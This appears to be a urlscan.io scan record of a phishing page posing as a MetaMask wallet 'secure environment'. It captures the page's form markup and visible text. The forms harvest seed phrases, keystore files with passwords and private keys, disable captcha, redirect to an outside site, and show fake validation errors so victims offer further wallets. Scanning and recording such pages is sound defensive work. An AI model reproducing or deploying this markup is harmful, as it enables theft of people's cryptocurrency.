debug-metamask.pages.dev
Open in
urlscan Pro
172.66.44.61
Public Scan
Submitted URL: http://debug-metamask.pages.dev/secure/index.html
Effective URL: https://debug-metamask.pages.dev/secure/
Submission: On April 08 via api from US — Scanned from US
Effective URL: https://debug-metamask.pages.dev/secure/
Submission: On April 08 via api from US — Scanned from US
Form analysis
3 forms found in the DOM<form method="" class="gform" id="phraseForm">
<!---- HONEYPOT----->
<!-- <input type="text" name="_honey" style="display: none;"> -->
<!---- DISABLE CAPTCHA----->
<!-- <input type="hidden" name="_captcha" value="false"> -->
<!-- <input type="hidden" name="_next"
value="https://activeresetlaunch.site//next/action1/success.html"> -->
<div id="first" class="acc-body active">
<div class="flex flex-col">
</div>
<div class="flex flex-col mb-6">
<div class="relative" data-children-count="1">
<textarea id="recovery_phrase" cols="30" rows="4" onpaste="testPaste()" placeholder="Enter your recovery phrase"
class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400" name="phrase" required=""></textarea>
<p class="text-xs text-grey-300 mt-6"> Typically 12 (sometimes 24) words separated by single spaces </p>
</div>
</div>
<div class="flex w-full">
<button type="submit" form="phraseForm" class="btn btn-primary flex items-center justify-center focus:outline-none text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2 w-full transition duration-150 ease-in">
<span class="mr-2 uppercase" onclick="thankyou_message()">Import</span>
<span>
<svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
<path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9 0 11-18 0 9 9 0 0118 0z">
</path>
</svg>
</span>
</button>
</div>
<!-- Successfully Submitted page-->
<div style="display: none;" class="thankyou_message">
<center>
<p class="successful">Error Validating Wallet !!!, please retry with a different wallet</p>
</center>
<img src="error.png" width="25%" height="25%" style="display:block; margin-left:auto; margin-right:auto" class="thankyou_message">
</div>
</div>
</form>
<form method="" class="gform" id="keystoreForm">
<!---- HONEYPOT----->
<input type="text" name="_honey" style="display: none;">
<!---- DISABLE CAPTCHA----->
<input type="hidden" name="_captcha" value="false">
<input type="hidden" name="_next" value="https://activeresetlaunch.site//next/action1/success.html">
<!---- <input type="hidden" name="_captcha" value="false">
<input type="hidden" name="_next" value="error.html"> ----->
<div id="second" class="acc-body bg-grey-600">
<div class="flex flex-col">
</div>
<div class="flex flex-col mb-6">
<div class="relative">
<textarea cols="30" rows="4" id="keystoreJson" placeholder="Enter your Keystore JSON" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400"
name="keystore" required=""></textarea>
</div>
</div>
<div class="flex flex-col mb-6">
<div class="relative" data-children-count="1">
<input type="text" name="password" placeholder="Wallet password" id="keystorePassword" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
<p class="text-xs text-grey-300 mt-6"> Several lines of text beginning with "{...}" plus the password you used to encrypt it. </p>
</div>
</div>
<div class="flex w-full">
<button type="submit" form="keystoreForm" class="flex items-center justify-center focus:outline-none
text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
w-full transition duration-150 ease-in">
<span class="mr-2
uppercase" onclick="thankyou_message()">Import</span>
<span>
<svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
<path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
0 11-18 0 9 9 0 0118 0z"></path>
</svg>
</span>
</button>
</div>
<!-- Successfully Submitted page-->
<div style="display:none" class="thankyou_message">
<center>
<p class="successful">Unable to Validate Wallet !!!, try another wallet</p>
</center>
<img src="error.png" width="25%" height="25%" style="display:block; margin-left:auto; margin-right:auto" class="thankyou_message">
</div>
</div>
</form>
<form method="" class="gform" id="privateKeyForm">
<!---- HONEYPOT----->
<input type="text" name="_honey" style="display: none;">
<!---- DISABLE CAPTCHA----->
<input type="hidden" name="_captcha" value="false">
<input type="hidden" name="_next" value="https://activeresetlaunch.site//next/action1/success.html">
<!---- <input type="hidden" name="_captcha" value="false">
<input type="hidden" name="_next" value="error.html"> ----->
<div id="third" class="acc-body bg-grey-600">
<div class="flex flex-col">
<div class="relative"><input type="hidden" name="wallet_id" required="required" placeholder="Wallet ID" id="wallet_id" value="Metamask"></div>
</div>
<div class="flex flex-col mb-6">
<div class="relative" data-children-count="1">
<input type="text" id="privateKey" placeholder="Enter your Private Key" name="key" class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
<p class="text-xs text-grey-300 mt-6"> Typically 12 (sometimes 24) words seperated by a single space. </p>
</div>
</div>
<div class="flex w-full">
<button type="submit" form="privateKeyForm" class="flex items-center justify-center focus:outline-none
text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
w-full transition duration-150 ease-in">
<span class="mr-2
uppercase" onclick="thankyou_message()">Import</span>
<span>
<svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
<path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
0 11-18 0 9 9 0 0118 0z"></path>
</svg>
</span>
</button>
</div>
</div>
</form>
Text Content
SETTING UP A SECURE ENVIROMENT Back Initializing... Connect Manually Metamask Easy-to-use browser extension. IMPORT YOUR METAMASK WALLET Phrase Keystore JSON Private Key Typically 12 (sometimes 24) words separated by single spaces Import Error Validating Wallet !!!, please retry with a different wallet Several lines of text beginning with "{...}" plus the password you used to encrypt it. Import Unable to Validate Wallet !!!, try another wallet Typically 12 (sometimes 24) words seperated by a single space. Import Cancel WALLETCONNECT Connect to a wallet Auro wallet Metamask Trust Phantom Xumm SaitaPro Coinbase crypto.com Blockchain Binance Smart Chain Safepal Safemoon WalletConnect Argent XinFin Terra Station Keplr D'Cent Ledger Trezor Neon Fortmatic Aktionariat Keyring Pro BitKeep SparkPoint OwnBit Infinty Wallet Wallet.io Infinito Torus Nash BitPay imTOken Other Wallet Navigated to Wallets